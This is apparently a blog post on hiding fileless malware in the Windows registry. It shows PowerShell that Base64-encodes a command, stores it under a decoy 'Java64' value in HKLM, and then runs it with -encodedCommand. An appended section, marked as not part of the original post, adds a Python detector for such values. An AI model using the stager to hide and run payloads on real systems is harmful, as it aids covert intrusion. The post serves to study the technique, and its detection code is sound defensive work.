Fileless Malware Storage: Registry – 1 of 4

Malware delivery methods have changed over the years and, in some cases, repeated themselves. Within the last couple of years, fileless malware has become prevalent and more widely seen. How this malware is stored on disk varies. Frankly speaking, anywhere that can store data, be it hex or ASCII, serves as a great candidate. Over a series of posts, I’ll highlight a number of methods that can be used for fileless malware.

The first method I’ll address is the registry, which contains a wealth of data and is well suited to the purpose. It is highly unlikely that an admin or defender would know every key or value in the registry. Because of that, we have a good chance of being able to stage our malware there without human detection. If the target is monitoring for the creation of registry keys or values, this tactic becomes much more difficult, though not impossible. Below is an example of this tactic being utilized through PowerShell.

# Registry Stager Store
$command = 'Start-BitsTransfer -Source " _ Catster_files\feral-cat-day.jpg" -Destination "C:\cat2.jpg"'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
New-ItemProperty HKLM:\software -Name "Java64" -Value $encodedCommand -PropertyType multistring

# Registry Stager Retrieval
$cmd = Get-ItemPropertyValue HKLM:\SOFTWARE -Name "Java64"
powershell.exe -encodedCommand $cmd
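
One way to hunt for values stored the way the stager above stores them (Base64 of UTF-16LE text, the form `-encodedCommand` expects), added here as an example and not part of the original post. The function names, the 16-character and 90% ASCII thresholds, and the sample values are assumptions constructed for illustration; the input is value data already exported from the registry.

```python
import base64
import binascii
import re

# Base64 alphabet only; 16+ characters is an assumed minimum for a command.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_encoded_command(data):
    """Return decoded text if data is Base64 of mostly-ASCII UTF-16LE, else None."""
    candidate = data.strip()
    if not B64_RE.fullmatch(candidate):
        return None
    try:
        text = base64.b64decode(candidate, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None
    # Heuristic (assumed 90% threshold): PowerShell text is almost all ASCII,
    # while arbitrary bytes read as UTF-16LE come out mostly non-ASCII.
    ascii_like = sum(ch in "\r\n\t" or " " <= ch <= "~" for ch in text)
    return text if ascii_like / len(text) >= 0.9 else None


def scan_values(values):
    """values: (key, name, data) tuples; data is a str or, for REG_MULTI_SZ, a list."""
    hits = []
    for key, name, data in values:
        for item in (data if isinstance(data, list) else [data]):
            decoded = decode_encoded_command(item) if isinstance(item, str) else None
            if decoded is not None:
                hits.append((key, name, decoded))
    return hits


# Constructed sample data: one value built the way the stager builds it, with a
# harmless command, next to ordinary-looking values.
SAMPLE_COMMAND = 'Write-Output "constructed sample"'
SAMPLE_VALUES = [
    ("HKLM:\\SOFTWARE", "Java64",
     [base64.b64encode(SAMPLE_COMMAND.encode("utf-16-le")).decode("ascii")]),
    ("HKLM:\\SOFTWARE\\Example", "InstallDir", "C:\\Program Files\\Example"),
    ("HKLM:\\SOFTWARE\\Example", "Component", "ProgramFilesCommonX86Dir"),
    ("HKLM:\\SOFTWARE\\Example", "Flags", 1),
]

if __name__ == "__main__":
    for key, name, decoded in scan_values(SAMPLE_VALUES):
        print(f"{key}\\{name}: {decoded}")
```

The ASCII-ratio test is what keeps Base64-looking identifiers such as the constructed `Component` value from being reported; a command written mostly in non-ASCII characters would fall below it.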